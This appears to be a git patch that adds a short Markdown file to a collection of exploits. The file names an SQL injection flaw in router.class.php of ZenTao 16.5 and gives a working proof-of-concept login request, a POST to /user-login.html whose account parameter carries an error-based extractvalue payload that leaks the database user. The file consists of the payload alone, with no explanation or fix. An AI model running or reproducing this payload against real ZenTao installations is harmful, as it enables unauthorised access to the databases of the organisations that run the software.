From 5c72bbebb68d7c4d97f984b48cdee82d1c89abcf Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 20:36:36 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=A6=85=E9=81=93=2016.5=20router.cla?= =?UTF-8?q?ss.php=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 禅道 16.5 router.class.php SQL注入漏洞.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 禅道 16.5 router.class.php SQL注入漏洞.md diff --git a/禅道 16.5 router.class.php SQL注入漏洞.md b/禅道 16.5 router.class.php SQL注入漏洞.md new file mode 100644 index 0000000..738edf6 --- /dev/null +++ b/禅道 16.5 router.class.php SQL注入漏洞.md @@ -0,0 +1,5 @@ +## 禅道 16.5 router.class.php SQL注入漏洞 +``` +POST /user-login.html +account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23 +```